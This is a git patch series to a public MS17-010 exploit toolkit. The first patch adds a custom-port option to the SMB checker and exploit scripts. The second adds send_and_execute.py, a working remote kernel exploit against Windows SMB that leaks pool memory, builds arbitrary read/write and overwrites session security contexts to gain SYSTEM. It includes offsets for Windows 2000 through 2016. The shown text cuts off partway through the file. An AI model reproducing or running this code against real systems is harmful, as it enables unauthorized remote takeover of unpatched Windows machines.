From 85377b802e98d5ce99e47ea7b84b977e700a8fcf Mon Sep 17 00:00:00 2001
From: "Helvio Junior (M4v3r1cK)" <helvio_junior@hotmail.com>
Date: Tue, 7 Aug 2018 19:13:09 -0300
Subject: [PATCH 1/5] Adding suport to custom tcp port

---
 checker.py     | 14 +++++++++++---
 mysmb.py       |  4 ++--
 zzz_exploit.py | 17 ++++++++++++-----
 3 files changed, 25 insertions(+), 10 deletions(-)

diff --git a/checker.py b/checker.py
index 4bc6793..a370a74 100644
--- a/checker.py
+++ b/checker.py
@@ -31,13 +31,21 @@
 }
 
 
-if len(sys.argv) != 2:
-	print("{} <ip>".format(sys.argv[0]))
+if len(sys.argv) < 2:
+	print("{} <ip> [port]".format(sys.argv[0]))
 	sys.exit(1)
 
 target = sys.argv[1]
+port = 445
 
-conn = MYSMB(target)
+try:
+	if sys.argv[2] != '':
+		port = int(sys.argv[2])
+except:
+	pass
+
+print('Trying to connect to %s:%d' % (target, port))
+conn = MYSMB(target, port)
 try:
 	conn.login(USERNAME, PASSWORD)
 except smb.SessionError as e:
diff --git a/mysmb.py b/mysmb.py
index fa42ce6..37c13b0 100644
--- a/mysmb.py
+++ b/mysmb.py
@@ -104,7 +104,7 @@ def _setup_login_packet_hook(maxBufferSize):
 
 
 class MYSMB(smb.SMB):
-	def __init__(self, remote_host, use_ntlmv2=True, timeout=8):
+	def __init__(self, remote_host, remote_port=445, use_ntlmv2=True, timeout=8):
 		self.__use_ntlmv2 = use_ntlmv2
 		self._default_tid = 0
 		self._pid = os.getpid() & 0xffff
@@ -115,7 +115,7 @@ def __init__(self, remote_host, use_ntlmv2=True, timeout=8):
 		self._last_tid = 0  # last tid from connect_tree()
 		self._last_fid = 0  # last fid from nt_create_andx()
 		self._smbConn = None
-		smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
+		smb.SMB.__init__(self, remote_host, remote_host, sess_port=remote_port, timeout=timeout)
 
 	def set_pid(self, pid):
 		self._pid = pid
diff --git a/zzz_exploit.py b/zzz_exploit.py
index f1bf4cf..78ed213 100644
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -786,8 +786,8 @@ def create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroup
 	return fakeUserAndGroupCount, fakeUserAndGroups
 
 
-def exploit(target, pipe_name):
-	conn = MYSMB(target)
+def exploit(target, port, pipe_name):
+	conn = MYSMB(target, port)
 	
 	# set NODELAY to make exploit much faster
 	conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
@@ -1048,12 +1048,19 @@ def service_exec(conn, cmd):
 
 
 if len(sys.argv) < 2:
-	print("{} <ip> [pipe_name]".format(sys.argv[0]))
+	print("{} <ip> [port] [pipe_name]".format(sys.argv[0]))
 	sys.exit(1)
 
 target = sys.argv[1]
-pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
+pipe_name = None if len(sys.argv) < 4 else sys.argv[3]
+port = 445
 
-exploit(target, pipe_name)
+try:
+	if sys.argv[2] != '':
+		port = int(sys.argv[2])
+except:
+	pass
+
+exploit(target, port, pipe_name)
 print('Done')
 

From f94bbb3b1339354d9653cc8cc4f5816732f0ca45 Mon Sep 17 00:00:00 2001
From: "Helvio Junior (M4v3r1cK)" <helvio_junior@hotmail.com>
Date: Tue, 7 Aug 2018 19:52:24 -0300
Subject: [PATCH 2/5] Adding send_and_execute execution file

---
 send_and_execute.py | 1079 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 1079 insertions(+)
 create mode 100644 send_and_execute.py

diff --git a/send_and_execute.py b/send_and_execute.py
new file mode 100644
index 0000000..f9e351c
--- /dev/null
+++ b/send_and_execute.py
@@ -0,0 +1,1079 @@
+#!/usr/bin/python
+from impacket import smb, smbconnection
+from mysmb import MYSMB
+from struct import pack, unpack, unpack_from
+import sys
+import socket
+import time
+import string
+import random
+import os.path
+
+'''
+MS17-010 exploit for Windows 2000 and later by sleepya
+
+Note:
+- The exploit should never crash a target (chance should be nearly 0%)
+- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
+
+Tested on:
+- Windows 2016 x64
+- Windows 10 Pro Build 10240 x64
+- Windows 2012 R2 x64
+- Windows 8.1 x64
+- Windows 2008 R2 SP1 x64
+- Windows 7 SP1 x64
+- Windows 2008 SP1 x64
+- Windows 2003 R2 SP2 x64
+- Windows XP SP2 x64
+- Windows 8.1 x86
+- Windows 7 SP1 x86
+- Windows 2008 SP1 x86
+- Windows 2003 SP2 x86
+- Windows XP SP3 x86
+- Windows 2000 SP4 x86
+'''
+
+USERNAME = ''
+PASSWORD = ''
+
+'''
+A transaction with empty setup:
+- it is allocated from paged pool (same as other transaction types) on Windows 7 and later
+- it is allocated from private heap (RtlAllocateHeap()) with no on use it on Windows Vista and earlier
+- no lookaside or caching method for allocating it
+
+Note: method name is from NSA eternalromance
+
+For Windows 7 and later, it is good to use matched pair method (one is large pool and another one is fit
+for freed pool from large pool). Additionally, the exploit does the information leak to check transactions
+alignment before doing OOB write. So this exploit should never crash a target against Windows 7 and later.
+
+For Windows Vista and earlier, matched pair method is impossible because we cannot allocate transaction size
+smaller than PAGE_SIZE (Windows XP can but large page pool does not split the last page of allocation). But
+a transaction with empty setup is allocated on private heap (it is created by RtlCreateHeap() on initialing server).
+Only this transaction type uses this heap. Normally, no one uses this transaction type. So transactions alignment
+in this private heap should be very easy and very reliable (fish in a barrel in NSA eternalromance). The drawback
+of this method is we cannot do information leak to verify transactions alignment before OOB write.
+So this exploit has a chance to crash target same as NSA eternalromance against Windows Vista and earlier.
+'''
+
+'''
+Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
+win7 x64
+struct SrvSecContext {
+	DWORD xx1; // second WORD is size
+	DWORD refCnt;
+	PACCESS_TOKEN Token;  // 0x08
+	DWORD xx2;
+	BOOLEAN CopyOnOpen; // 0x14
+	BOOLEAN EffectiveOnly;
+	WORD xx3;
+	DWORD ImpersonationLevel; // 0x18
+	DWORD xx4;
+	BOOLEAN UsePsImpersonateClient; // 0x20
+}
+win2012 x64
+struct SrvSecContext {
+	DWORD xx1; // second WORD is size
+	DWORD refCnt;
+	QWORD xx2;
+	QWORD xx3;
+	PACCESS_TOKEN Token;  // 0x18
+	DWORD xx4;
+	BOOLEAN CopyOnOpen; // 0x24
+	BOOLEAN EffectiveOnly;
+	WORD xx3;
+	DWORD ImpersonationLevel; // 0x28
+	DWORD xx4;
+	BOOLEAN UsePsImpersonateClient; // 0x30
+}
+
+SrvImpersonateSecurityContext() is used in Windows Vista and later before doing any operation as logged on user.
+It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. 
+From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL,
+PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns
+STATUS_SUCCESS when Token is NULL.
+If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM)
+to do all SMB operations.
+Note: for Windows 2003 and earlier, the exploit modify token user and groups in PCtxtHandle to get SYSTEM because only
+  ImpersonateSecurityContext() is used in these Windows versions.
+'''
+###########################
+# info for modify session security context
+###########################
+WIN7_64_SESSION_INFO = {
+	'SESSION_SECCTX_OFFSET': 0xa0,
+	'SESSION_ISNULL_OFFSET': 0xba,
+	'FAKE_SECCTX': pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
+	'SECCTX_SIZE': 0x28,
+}
+
+WIN7_32_SESSION_INFO = {
+	'SESSION_SECCTX_OFFSET': 0x80,
+	'SESSION_ISNULL_OFFSET': 0x96,
+	'FAKE_SECCTX': pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
+	'SECCTX_SIZE': 0x1c,
+}
+
+# win8+ info
+WIN8_64_SESSION_INFO = {
+	'SESSION_SECCTX_OFFSET': 0xb0,
+	'SESSION_ISNULL_OFFSET': 0xca,
+	'FAKE_SECCTX': pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
+	'SECCTX_SIZE': 0x38,
+}
+
+WIN8_32_SESSION_INFO = {
+	'SESSION_SECCTX_OFFSET': 0x88,
+	'SESSION_ISNULL_OFFSET': 0x9e,
+	'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
+	'SECCTX_SIZE': 0x24,
+}
+
+# win 2003 (xp 64 bit is win 2003)
+WIN2K3_64_SESSION_INFO = {
+	'SESSION_ISNULL_OFFSET': 0xba,
+	'SESSION_SECCTX_OFFSET': 0xa0,  # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
+	'SECCTX_PCTXTHANDLE_OFFSET': 0x10,  # PCtxtHandle is at offset 0x8 but only upperPart is needed
+	'PCTXTHANDLE_TOKEN_OFFSET': 0x40,
+	'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
+	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
+}
+
+WIN2K3_32_SESSION_INFO = {
+	'SESSION_ISNULL_OFFSET': 0x96,
+	'SESSION_SECCTX_OFFSET': 0x80,  # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
+	'SECCTX_PCTXTHANDLE_OFFSET': 0xc,  # PCtxtHandle is at offset 0x8 but only upperPart is needed
+	'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
+	'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
+	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
+}
+
+# win xp
+WINXP_32_SESSION_INFO = {
+	'SESSION_ISNULL_OFFSET': 0x94,
+	'SESSION_SECCTX_OFFSET': 0x84,  # PCtxtHandle is at offset 0x80 but only upperPart is needed
+	'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
+	'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
+	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
+	'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1': 0x40,
+	'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1': 0x5c
+}
+
+WIN2K_32_SESSION_INFO = {
+	'SESSION_ISNULL_OFFSET': 0x94,
+	'SESSION_SECCTX_OFFSET': 0x84,  # PCtxtHandle is at offset 0x80 but only upperPart is needed
+	'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
+	'TOKEN_USER_GROUP_CNT_OFFSET': 0x3c,
+	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x58,
+}
+
+###########################
+# info for exploitation
+###########################
+# for windows 2008+
+WIN7_32_TRANS_INFO = {
+	'TRANS_SIZE' : 0xa0,  # struct size
+	'TRANS_FLINK_OFFSET' : 0x18,
+	'TRANS_INPARAM_OFFSET' : 0x40,
+	'TRANS_OUTPARAM_OFFSET' : 0x44,
+	'TRANS_INDATA_OFFSET' : 0x48,
+	'TRANS_OUTDATA_OFFSET' : 0x4c,
+	'TRANS_PARAMCNT_OFFSET' : 0x58,
+	'TRANS_TOTALPARAMCNT_OFFSET' : 0x5c,
+	'TRANS_FUNCTION_OFFSET' : 0x72,
+	'TRANS_MID_OFFSET' : 0x80,
+}
+
+WIN7_64_TRANS_INFO = {
+	'TRANS_SIZE' : 0xf8,  # struct size
+	'TRANS_FLINK_OFFSET' : 0x28,
+	'TRANS_INPARAM_OFFSET' : 0x70,
+	'TRANS_OUTPARAM_OFFSET' : 0x78,
+	'TRANS_INDATA_OFFSET' : 0x80,
+	'TRANS_OUTDATA_OFFSET' : 0x88,
+	'TRANS_PARAMCNT_OFFSET' : 0x98,
+	'TRANS_TOTALPARAMCNT_OFFSET' : 0x9c,
+	'TRANS_FUNCTION_OFFSET' : 0xb2,
+	'TRANS_MID_OFFSET' : 0xc0,
+}
+
+WIN5_32_TRANS_INFO = {
+	'TRANS_SIZE' : 0x98,  # struct size
+	'TRANS_FLINK_OFFSET' : 0x18,
+	'TRANS_INPARAM_OFFSET' : 0x3c,
+	'TRANS_OUTPARAM_OFFSET' : 0x40,
+	'TRANS_INDATA_OFFSET' : 0x44,
+	'TRANS_OUTDATA_OFFSET' : 0x48,
+	'TRANS_PARAMCNT_OFFSET' : 0x54,
+	'TRANS_TOTALPARAMCNT_OFFSET' : 0x58,
+	'TRANS_FUNCTION_OFFSET' : 0x6e,
+	'TRANS_PID_OFFSET' : 0x78,
+	'TRANS_MID_OFFSET' : 0x7c,
+}
+
+WIN5_64_TRANS_INFO = {
+	'TRANS_SIZE' : 0xe0,  # struct size
+	'TRANS_FLINK_OFFSET' : 0x28,
+	'TRANS_INPARAM_OFFSET' : 0x68,
+	'TRANS_OUTPARAM_OFFSET' : 0x70,
+	'TRANS_INDATA_OFFSET' : 0x78,
+	'TRANS_OUTDATA_OFFSET' : 0x80,
+	'TRANS_PARAMCNT_OFFSET' : 0x90,
+	'TRANS_TOTALPARAMCNT_OFFSET' : 0x94,
+	'TRANS_FUNCTION_OFFSET' : 0xaa,
+	'TRANS_PID_OFFSET' : 0xb4,
+	'TRANS_MID_OFFSET' : 0xb8,
+}
+
+X86_INFO = {
+	'ARCH' : 'x86',
+	'PTR_SIZE' : 4,
+	'PTR_FMT' : 'I',
+	'FRAG_TAG_OFFSET' : 12,
+	'POOL_ALIGN' : 8,
+	'SRV_BUFHDR_SIZE' : 8,
+}
+
+X64_INFO = {
+	'ARCH' : 'x64',
+	'PTR_SIZE' : 8,
+	'PTR_FMT' : 'Q',
+	'FRAG_TAG_OFFSET' : 0x14,
+	'POOL_ALIGN' : 0x10,
+	'SRV_BUFHDR_SIZE' : 0x10,
+}
+
+def merge_dicts(*dict_args):
+	result = {}
+	for dictionary in dict_args:
+		result.update(dictionary)
+	return result
+
+OS_ARCH_INFO = {
+	# for Windows Vista, 2008, 7 and 2008 R2
+	'WIN7': {
+		'x86': merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN7_32_SESSION_INFO),
+		'x64': merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN7_64_SESSION_INFO),
+	},
+	# for Windows 8 and later
+	'WIN8': {
+		'x86': merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN8_32_SESSION_INFO),
+		'x64': merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN8_64_SESSION_INFO),
+	},
+	'WINXP': {
+		'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WINXP_32_SESSION_INFO),
+		'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
+	},
+	'WIN2K3': {
+		'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K3_32_SESSION_INFO),
+		'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
+	},
+	'WIN2K': {
+		'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K_32_SESSION_INFO),
+	},
+}
+
+
+TRANS_NAME_LEN = 4
+HEAP_HDR_SIZE = 8  # heap chunk header size
+
+
+def calc_alloc_size(size, align_size):
+	return (size + align_size - 1) & ~(align_size-1)
+
+def wait_for_request_processed(conn):
+	#time.sleep(0.05)
+	# send echo is faster than sleep(0.05) when connection is very good
+	conn.send_echo('a')
+
+def find_named_pipe(conn):
+	pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
+	
+	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
+	found_pipe = None
+	for pipe in pipes:
+		try:
+			fid = conn.nt_create_andx(tid, pipe)
+			conn.close(tid, fid)
+			found_pipe = pipe
+			break
+		except smb.SessionError as e:
+			pass
+	
+	conn.disconnect_tree(tid)
+	return found_pipe
+
+
+special_mid = 0
+extra_last_mid = 0
+def reset_extra_mid(conn):
+	global extra_last_mid, special_mid
+	special_mid = (conn.next_mid() & 0xff00) - 0x100
+	extra_last_mid = special_mid
+	
+def next_extra_mid():
+	global extra_last_mid
+	extra_last_mid += 1
+	return extra_last_mid
+
+
+# Borrow 'groom' and 'bride' word from NSA tool
+# GROOM_TRANS_SIZE includes transaction name, parameters and data
+# Note: the GROOM_TRANS_SIZE size MUST be multiple of 16 to make FRAG_TAG_OFFSET valid
+GROOM_TRANS_SIZE = 0x5010
+
+def leak_frag_size(conn, tid, fid):
+	# this method can be used on Windows Vista/2008 and later
+	# leak "Frag" pool size and determine target architecture
+	info = {}
+	
+	# A "Frag" pool is placed after the large pool allocation if last page has some free space left.
+	# A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version.
+	# To make exploit more generic, exploit does info leak to find a "Frag" pool size.
+	# From the leak info, we can determine the target architecture too.
+	mid = conn.next_mid()
+	req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
+	req2 = conn.create_nt_trans_secondary_packet(mid, data='B'*276) # leak more 276 bytes
+	
+	conn.send_raw(req1[:-8])
+	conn.send_raw(req1[-8:]+req2)
+	leakData = conn.recv_transaction_data(mid, 0x10d0+276)
+	leakData = leakData[0x10d4:]  # skip parameters and its own input
+	# Detect target architecture and calculate frag pool size
+	if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
+		print('Target is 32 bit')
+		info['arch'] = 'x86'
+		info['FRAG_POOL_SIZE'] = ord(leakData[ X86_INFO['FRAG_TAG_OFFSET']-2 ]) * X86_INFO['POOL_ALIGN']
+	elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
+		print('Target is 64 bit')
+		info['arch'] = 'x64'
+		info['FRAG_POOL_SIZE'] = ord(leakData[ X64_INFO['FRAG_TAG_OFFSET']-2 ]) * X64_INFO['POOL_ALIGN']
+	else:
+		print('Not found Frag pool tag in leak data')
+		sys.exit()
+	
+	print('Got frag size: 0x{:x}'.format(info['FRAG_POOL_SIZE']))
+	return info
+
+
+def read_data(conn, info, read_addr, read_size):
+	fmt = info['PTR_FMT']
+	# modify trans2.OutParameter to leak next transaction and trans2.OutData to leak real data
+	# modify trans2.*ParameterCount and trans2.*DataCount to limit data
+	new_data = pack('<'+fmt*3, info['trans2_addr']+info['TRANS_FLINK_OFFSET'], info['trans2_addr']+0x200, read_addr)  # OutParameter, InData, OutData
+	new_data += pack('<II', 0, 0)  # SetupCount, MaxSetupCount
+	new_data += pack('<III', 8, 8, 8)  # ParamterCount, TotalParamterCount, MaxParameterCount
+	new_data += pack('<III', read_size, read_size, read_size)  # DataCount, TotalDataCount, MaxDataCount
+	new_data += pack('<HH', 0, 5)  # Category, Function (NT_RENAME)
+	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])
+	
+	# create one more transaction before leaking data
+	# - next transaction can be used for arbitrary read/write after the current trans2 is done
+	# - next transaction address is from TransactionListEntry.Flink value
+	conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=0x4300-0x20, totalParameterCount=0x1000)
+
+	# finish the trans2 to leak
+	conn.send_nt_trans_secondary(mid=info['trans2_mid'])
+	read_data = conn.recv_transaction_data(info['trans2_mid'], 8+read_size)
+	
+	# set new trans2 address
+	info['trans2_addr'] = unpack_from('<'+fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']
+	
+	# set trans1.InData to &trans2
+	conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<'+fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])
+	wait_for_request_processed(conn)
+
+	# modify trans2 mid
+	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
+	wait_for_request_processed(conn)
+	
+	return read_data[8:]  # no need to return parameter
+
+def write_data(conn, info, write_addr, write_data):
+	# trans2.InData
+	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<'+info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])
+	wait_for_request_processed(conn)
+	
+	# write data
+	conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)
+	wait_for_request_processed(conn)
+
+
+def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
+	trans_param = pack('<HH', fid, 0)  # param for NT_RENAME
+	# fill large pagedpool holes (maybe no need)
+	for i in range(numFill):
+		conn.send_nt_trans(5, param=trans_param, totalDataCount=0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0)
+
+	mid_ntrename = conn.next_mid()
+	# first GROOM, for leaking next BRIDE transaction
+	req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A'*0x10d0, maxParameterCount=info['GROOM_DATA_SIZE']-0x10d0)
+	req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B'*276) # leak more 276 bytes
+	# second GROOM, for controlling next BRIDE transaction
+	req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE']-0x1000, maxParameterCount=0x1000)
+	# many BRIDEs, expect two of them are allocated at splitted pool from GROOM
+	reqs = []
+	for i in range(12):
+		mid = next_extra_mid()
+		reqs.append(conn.create_trans_packet('', mid=mid, param=trans_param, totalDataCount=info['BRIDE_DATA_SIZE']-0x200, totalParameterCount=0x200, maxDataCount=0, maxParameterCount=0))
+
+	conn.send_raw(req1[:-8])
+	conn.send_raw(req1[-8:]+req2+req3+''.join(reqs))
+	
+	# expected transactions alignment ("Frag" pool is not shown)
+	#
+	#    |         5 * PAGE_SIZE         |   PAGE_SIZE    |         5 * PAGE_SIZE         |   PAGE_SIZE    |
+	#    +-------------------------------+----------------+-------------------------------+----------------+
+	#    |    GROOM mid=mid_ntrename        |  extra_mid1 |         GROOM mid=fid            |  extra_mid2 |
+	#    +-------------------------------+----------------+-------------------------------+----------------+
+	#
+	# If transactions are aligned as we expected, BRIDE transaction with mid=extra_mid1 will be leaked.
+	# From leaked transaction, we get
+	# - leaked transaction address from InParameter or InData
+	# - transaction, with mid=extra_mid2, address from LIST_ENTRY.Flink
+	# With these information, we can verify the transaction aligment from displacement.
+
+	leakData = conn.recv_transaction_data(mid_ntrename, 0x10d0+276)
+	leakData = leakData[0x10d4:]  # skip parameters and its own input
+	#open('leak.dat', 'wb').write(leakData)
+
+	if leakData[info['FRAG_TAG_OFFSET']:info['FRAG_TAG_OFFSET']+4] != 'Frag':
+		print('Not found Frag pool tag in leak data')
+		return None
+	
+	# ================================
+	# verify leak data
+	# ================================
+	leakData = leakData[info['FRAG_TAG_OFFSET']-4+info['FRAG_POOL_SIZE']:]
+	# check pool tag and size value in buffer header
+	expected_size = pack('<H', info['BRIDE_TRANS_SIZE'])
+	leakTransOffset = info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE']
+	if leakData[0x4:0x8] != 'LStr' or leakData[info['POOL_ALIGN']:info['POOL_ALIGN']+2] != expected_size or leakData[leakTransOffset+2:leakTransOffset+4] != expected_size:
+		print('No transaction struct in leak data')
+		return None
+
+	leakTrans = leakData[leakTransOffset:]
+
+	ptrf = info['PTR_FMT']
+	_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+ptrf*5, leakTrans, 8)
+	inparam_value = unpack_from('<'+ptrf, leakTrans, info['TRANS_INPARAM_OFFSET'])[0]
+	leak_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
+
+	print('CONNECTION: 0x{:x}'.format(connection_addr))
+	print('SESSION: 0x{:x}'.format(session_addr))
+	print('FLINK: 0x{:x}'.format(flink_value))
+	print('InParam: 0x{:x}'.format(inparam_value))
+	print('MID: 0x{:x}'.format(leak_mid))
+
+	next_page_addr = (inparam_value & 0xfffffffffffff000) + 0x1000
+	if next_page_addr + info['GROOM_POOL_SIZE'] + info['FRAG_POOL_SIZE'] + info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE'] + info['TRANS_FLINK_OFFSET'] != flink_value:
+		print('unexpected alignment, diff: 0x{:x}'.format(flink_value - next_page_addr))
+		return None
+	# trans1: leak transaction
+	# trans2: next transaction
+	return {
+		'connection': connection_addr,
+		'session': session_addr,
+		'next_page_addr': next_page_addr,
+		'trans1_mid': leak_mid,
+		'trans1_addr': inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN,
+		'trans2_addr': flink_value - info['TRANS_FLINK_OFFSET'],
+	}
+
+def exploit_matched_pairs(conn, pipe_name, info):
+	# for Windows 7/2008 R2 and later
+	
+	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
+	conn.set_default_tid(tid)
+	# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
+	fid = conn.nt_create_andx(tid, pipe_name)
+	
+	info.update(leak_frag_size(conn, tid, fid))
+	# add os and arch specific exploit info
+	info.update(OS_ARCH_INFO[info['os']][info['arch']])
+	
+	# groom: srv buffer header
+	info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
+	print('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
+	# groom paramters and data is alignment by 8 because it is NT_TRANS
+	info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - info['TRANS_SIZE']  # alignment (4)
+
+	# bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
+	bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
+	info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
+	print('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
+	# bride paramters and data is alignment by 4 because it is TRANS
+	info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - info['TRANS_SIZE']
+	
+	# ================================
+	# try align pagedpool and leak info until satisfy
+	# ================================
+	leakInfo = None
+	# max attempt: 10
+	for i in range(10):
+		reset_extra_mid(conn)
+		leakInfo = align_transaction_and_leak(conn, tid, fid, info)
+		if leakInfo is not None:
+			break
+		print('leak failed... try again')
+		conn.close(tid, fid)
+		conn.disconnect_tree(tid)
+		
+		tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
+		conn.set_default_tid(tid)
+		fid = conn.nt_create_andx(tid, pipe_name)
+
+	if leakInfo is None:
+		return False
+	
+	info['fid'] = fid
+	info.update(leakInfo)
+
+	# ================================
+	# shift transGroom.Indata ptr with SmbWriteAndX
+	# ================================
+	shift_indata_byte = 0x200
+	conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)
+
+	# Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
+	#       So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
+	# maxParameterCount (0x1000), trans name (4), param (4)
+	indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte
+	indata_next_trans_displacement = info['trans2_addr'] - indata_value
+	conn.send_nt_trans_secondary(mid=fid, data='\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])
+	wait_for_request_processed(conn)
+
+	# if the overwritten is correct, a modified transaction mid should be special_mid now.
+	# a new transaction with special_mid should be error.
+	recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')
+	if recvPkt.getNTStatus() != 0x10002:  # invalid SMB
+		print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
+		print('!!! Write to wrong place !!!')
+		print('the target might be crashed')
+		return False
+
+	print('success controlling groom transaction')
+
+	# NSA exploit set refCnt on leaked transaction to very large number for reading data repeatly
+	# but this method make the transation never get freed
+	# I will avoid memory leak
+	
+	# ================================
+	# modify trans1 struct to be used for arbitrary read/write
+	# ================================
+	print('modify trans1 struct for arbitrary read/write')
+	fmt = info['PTR_FMT']
+	# use transGroom to modify trans2.InData to &trans1. so we can modify trans1 with trans2 data
+	conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
+	wait_for_request_processed(conn)
+
+	# modify
+	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
+	# - trans1.InData to &trans2. so we can modify trans2 with trans1 data
+	conn.send_nt_trans_secondary(mid=special_mid, data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
+	wait_for_request_processed(conn)
+
+	# modify trans2.mid
+	info['trans2_mid'] = conn.next_mid()
+	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
+	return True
+
+def exploit_fish_barrel(conn, pipe_name, info):
+	# for Windows Vista/2008 and earlier
+	
+	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
+	conn.set_default_tid(tid)
+	# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
+	fid = conn.nt_create_andx(tid, pipe_name)
+	info['fid'] = fid
+
+	if info['os'] == 'WIN7' and 'arch' not in info:
+		# leak_frag_size() can be used against Windows Vista/2008 to determine target architecture
+		info.update(leak_frag_size(conn, tid, fid))
